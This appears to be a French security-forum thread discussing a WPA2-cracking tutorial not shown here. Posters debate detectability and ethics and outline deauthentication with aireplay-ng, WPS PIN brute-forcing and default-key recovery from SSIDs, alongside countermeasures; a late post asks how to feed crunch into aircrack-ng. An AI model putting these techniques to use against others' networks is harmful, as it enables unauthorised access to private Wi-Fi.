Je n'injecte aucun paquet, en effet. Par contre, j'aurais pu faire un passage sur la dé-authentification d'un client (qui se fait via l'envoi de paquet DeAuth).
18-11-2013, 14h22
Message : #15
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
(18-11-2013, 00h36)gruik a écrit : reste que ce serait potentiellement encore plus facile à détecter du coup...

Comment tu veux detecter une carte qui n'emet pas?
18-11-2013, 21h19
Message : #16
levur Hors ligne
Membre
*



Messages : 27
Sujets : 3
Points: 10
Inscription : Sep 2013
RE: [HowTo] Cracker un réseau WPA2
Certaine box permette de faire une white liste des MAC
Après tu peux scripter un tool qui te previens a chaque connexion d'une new carte réseau est la tu check
Citation :Staline a hérité d'une Russie à la charrue, et l'a laissée avec l'arme atomique,
L'histoire n'oublie pas de telles personnes...
Churchill 1959 Chambre des Communes
19-11-2013, 01h08
Message : #17
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(18-11-2013, 14h22)c4ffein a écrit : Comment tu veux detecter une carte qui n'emet pas?

ben la carte émet bien des paquets puisqu'elle réalise un bruteforce, on parle de détecter par exemple 5 ou 10 essais invalides, directement au niveau de l'AP (envisager des contre-mesures efficaces à implémenter directement sur la "box" si tu préfères)

quant à détecter un élément passif (== qui n'émet pas, une carte réseau en train de sniffer typiquement) c'est possible au niveau 2, au niveau 1 en revanche (quand la carte n'a pas encore rejoint le réseau wi-fi) j'en doute

mais encore une fois c'était des questions lancées un peu au hasard pour illustrer mon propos principal qui était de dire qu'un tuto qui explique comment pirater c'est bien, mais se poser des questions sur comment contrer les techniques de piratage sur un forum taggé "white hat hacking" c'est quand même mieux, et que ça devrait théoriquement être la finalité de tout un chacun
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
19-11-2013, 01h11
Message : #18
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
C'est vrai que sans contre-mesure ce tuto est un peu décalé, ici, maintenant que j'y pense... Possible de donner une suite à un modérateur pour qu'il la rajoute au 1er post ?
19-11-2013, 14h41
Message : #19
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
@gruik : c'etait une question rethorique.. enfin bref

(19-11-2013, 01h08)gruik a écrit : ben la carte émet bien des paquets puisqu'elle réalise un bruteforce, on parle de détecter par exemple 5 ou 10 essais invalides, directement au niveau de l'AP (envisager des contre-mesures efficaces à implémenter directement sur la "box" si tu préfères)
Non, il bruteforce le handshake sur son pc

(19-11-2013, 01h08)gruik a écrit : quant à détecter un élément passif (== qui n'émet pas, une carte réseau en train de sniffer typiquement) c'est possible au niveau 2, au niveau 1 en revanche (quand la carte n'a pas encore rejoint le réseau wi-fi) j'en doute
Voila, tu peux pas detecter une carte en mode monitor

(19-11-2013, 01h08)gruik a écrit : mais encore une fois c'était des questions lancées un peu au hasard pour illustrer mon propos principal qui était de dire qu'un tuto qui explique comment pirater c'est bien, mais se poser des questions sur comment contrer les techniques de piratage sur un forum taggé "white hat hacking" c'est quand même mieux, et que ça devrait théoriquement être la finalité de tout un chacun
Honnetement, il peut y avoir marquer white/black/rainbow hat, au final c est juste des infos techniques qui peuvent etre utiliser pour faire le "bien" comme le "mal". Apres on peut reprocher que ce soit un tuto qui explique en detail comment mener une attaque et pas un cours sur les securites du wifi.
19-11-2013, 15h27
Message : #20
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(19-11-2013, 14h41)c4ffein a écrit : Non, il bruteforce le handshake sur son pc (...) tu peux pas detecter une carte en mode monitor

au temps pour moi

(19-11-2013, 14h41)c4ffein a écrit : Honnetement, il peut y avoir marquer white/black/rainbow hat, au final c est juste des infos techniques (...)

je te remercie de ton honnêteté, il ne s'agit donc pas de reprocher mais bel et bien d'"attirer l'attention sur", le bienfondé ou l'orientation des infos techniques relevant de l'avis des modérateurs, à l'instar de n'importe quel autre site
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
19-11-2013, 16h14
Message : #21
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
Justement, ca sert a rien de demander a rajouter une partie securisation, c est dans l ensemble que son tuto est contraire a l ethique du hacker, il donne une liste des commandes a rentrer sans expliquer ce qu'il se passe, resultat t as lu son tutoriel et t as meme pas compris que le bf est realiser en local. Rajouter un lexique comme le demande ReVeRse c est le minimum.

Le truc qui me derange le plus, c'est le titre du thread : "[HowTo] Cracker un réseau WPA2", comme si il donnait la methode universelle a appliquer a la lettre. Y a pleins d autres methodes beaucoup plus efficaces mais qui ne marchent que dans certains cas particulier, en parler serait interessant.
19-11-2013, 16h47 (Modification du message : 19-11-2013, 16h59 par Enila.)
Message : #22
supersnail Hors ligne
Éleveur d'ornithorynques
*******



Messages : 1,613
Sujets : 72
Points: 466
Inscription : Jan 2012
RE: [HowTo] Cracker un réseau WPA2
Ce qui serait encore plus cool ce serait d'apporter des explications ou des précisions plûtot que de critiquer un tuto sur des points déjà soulevés par d'autres membres.


Bref faut croire que c'est un sport national ici, la critique non constructive, va bientôt falloir organiser des compétitions
Mon blog

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
19-11-2013, 18h45
Message : #23
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
C'est vrai que je troll sans m en rendre compte desolé. J'apportais rien parce que je m'y connais pas trop niveau wifi, mais je vais quand meme parler des quelques "astuces" que je connais :

Deauthentication:
Pour recuperer un handshake il faut normalement attendre qu'un nouvel equippement se connecte, cependant il est possible avec aireplay-ng et une carte compatible avec l'injection de packets de desassocier un device et son ap, on peut donc recuperer le handshake a la reconnection.
http://www.aircrack-ng.org/doku.php?id=deauthentication
Je ne connais pas de solution simple pour empecher la desassociation, mais c'est pas vraiment un probleme : elle permet seulement a l attaquant de recuperer le handshake, qu'il aurait pu obtenir a la connection d un nouvel equipement.

WPS:
D'apres Wikipedia:
Citation :Le but du protocole WPS est de simplifier la phase de configuration de la sécurité des réseaux sans fil1. Il permet à des particuliers ayant peu de connaissances sur la sécurité de configurer un accès WPA, supporté par les appareils Wi-Fi.

Ce standard met l'accent sur l'utilisabilité et la sécurité, et le concept se décline en quatre façons d'établir un réseau domestique. L'utilisateur voulant ajouter un périphérique au réseau peut utiliser au choix :

-la méthode PIN (Personal Identification Number), un numéro à lire sur une étiquette (ou un écran) du nouvel appareil, et à reporter sur le « représentant » du réseau (le point d'accès ou le registrar).

...
sauf que la securite du code PIN est tres faible, je vais pas expliquer en detail, j'ai trouvé ce tuto qui le fait tres bien : http://samoht.fr/tuto/attaque-wps-par-forcebrut
Pour s'en proteger il suffit de désactiver le wps.


Mot de passe par defaut de la box:
Pour certaines box il est possible de retrouver le mot de passe wpa par defaut a partir de l ssid, l algorithme de generation des cles etant decouvert.
C'est un truc connu sur les anciennes bbox et d autres ap moins utilises, par contre je sais pas si maintenant les pass wpa sont génerés de maniere pseudo aleatoire, ou si c'est en théorie possible sur des box recentes.
Dans tous les cas, c'est toujours mieux de changer le pass par defaut.
19-11-2013, 21h06
Message : #24
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
Oui, je sais, c'est un tuto qui explique comment faire X et Y. Mais je ne dis en aucun point que c'est la seule et la meilleur des manières de faire du cracking de WPA ! Qui plus est, les tutos sur les BOF je comprends pas trop non plus. J'en ai fait des recherches Google pour comprendre ne serait-ce qu'un tiers du tuto.

Bref, comme dit avant, un ajout est dans les studios alors avec un peu de patience, ce tuto sera un poil plus correspondant avec l'éthique du site. Smile

PS: Un tuto BOF on peut très bien l'utiliser à mal pour, par exemple, trouver des infos admin sur un ordi d'université ou autre. Je ne fais que donner des infos.
20-11-2013, 00h18
Message : #25
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
Je vais faire du gros hs, mais bon on est plus a un post hs pres.
La majorite des tutos sur les bof sont depasser, y a pleins de protections avec les nouveaux proco/os qui font que c'est plus aussi facile qu avant, le mieux pour apprendre c est de s entrainer avec les vieux tutos connus (comme ca t es sur que tu lis pas nimporte quoi) sur des vm, si t as la flemme d en creer pour t entrainer inscris toi ici http://www.zenk-security.com/epreuves.php et fait les failles applicatives, j me souviens plus trop mais j crois que c est a partir du medium sans aslr les bof.

Et j'ai jamais critiquer le fait que tu donne des infos qui peuvent etre mal utilisees, mais la forme : une liste de commandes a rentrer dans le terminal et une explication rapide, c'est pas le mieux pour comprendre, et ca peut permettre aux skids de s amuser sur la box du voisin.
06-02-2014, 23h57 (Modification du message : 07-02-2014, 00h03 par Serphentas.)
Message : #26
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
Me revoilà ! Après avoir vaincu les dragons des plains de Drek'thar, j'ai pu trouver le chemin vers n-pn. Bref:

La prog et moi ça se limite au Java (cours de base au collège). Du coup, scripter des trucs anti-crack c'est assez compliqué. Néanmoins, je peux vous exposer le fonctionnement logique d'un éventuel script que quelqu'un d'ici pourrait écrire. Le voici:

http://pbrd.co/1neihT1

D'ailleurs, j'ai, dans ce tutoriel, montré comment procéder au crack/sniffing d'un réseau Wi-Fi. Pour sécuriser le sien, il suffit de prendre le tuto à l'envers. Par exemple, restreindre l'AP aux appareils dont l'adresse MAC est connue et enregistrée dans une table du routeur.

J'attends vos commentaires/suggestions/etc. Angel

(20-11-2013, 00h18)c4ffein a écrit : une liste de commandes a rentrer dans le terminal et une explication rapide, c'est pas le mieux pour comprendre, et ca peut permettre aux skids de s amuser sur la box du voisin.

Il peut faire ce qu'il veut, il va buter sur deux choses essentielles:
1) cracker avec des tables, c'est long, et le packet monkey typique n'a pas un cluster de serveurs 4U avec 4 Opterons 16 coeurs. Donc rien qu'à ce niveau, il est mal barré. Son MacBook Patate va pas le mener très loin.
2) stocker des tables (rainbow ou de mot de passe) ça prend énormément de place. Même moi qui me suis récemment fait plaisir avec quelques disques durs spacieux (RAIDz2 pour les intéressés) je ne pourrais stocker de quoi cracker des mots de passe moyens.
3) trouver les bonnes tables, c'est dur (surtout pour les MDP). Tout simplement.

Donc le kiddie il pourra se la péter devant les alléchantes femelles qu'il n'aura jamais dans sa vie en lui montrant du CLI. Rien de plus.
11-02-2014, 21h43
Message : #27
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
(06-02-2014, 23h57)Serphentas a écrit : Par exemple, restreindre l'AP aux appareils dont l'adresse MAC est connue et enregistrée dans une table du routeur.
Ca change presque rien, tu peux pas empecher le mac spoofing, pour securiser un bon gros pass ca suffit (et desactiver le wps si il l est)

(06-02-2014, 23h57)Serphentas a écrit : Donc le kiddie il pourra se la péter devant les alléchantes femelles qu'il n'aura jamais dans sa vie en lui montrant du CLI. Rien de plus.
Je sais, mais je critique pour le principe
11-02-2014, 21h54
Message : #28
Di0Sasm Hors ligne
Chimiste
*******



Messages : 924
Sujets : 56
Points: 91
Inscription : Aug 2011
RE: [HowTo] Cracker un réseau WPA2
Laisser moi le wps personnes s'en pré-occupe, on se croit au États-Unis Wifi partout. Smile
11-02-2014, 21h54 (Modification du message : 11-02-2014, 21h55 par Serphentas.)
Message : #29
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
Ouais, c'est vrai que tu peux vite changer de MAC. Ma foi, c'est comme ça... Comme t'as dit, avoir un pass avec une entropie suffisante et pas de WPS suffit à avoir une sécurité décente.

D'accord. J'ai posté tout ça pour montrer un peu comment ça se passe, pour qu'éventuellement ça mène à des contre-mesures ou à des débats.

@DI0Sasm: Pas compris :p
26-03-2020, 10h28
Message : #30
WagoO Hors ligne
Newbie
*



Messages : 1
Sujets : 0
Points: 0
Inscription : Mar 2020
RE: [HowTo] Cracker un réseau WPA2
Bonjour tous le mondes, je me demandais si les blackshat auraient conçu une solution au problème des wordlists infiniment trop lourde. Y'aurait il un outil, qui permettrai de combiner l'action de crunch a celle d'air-crack sans passer par la création d'un fichier lourd ? Bonne journée
Heart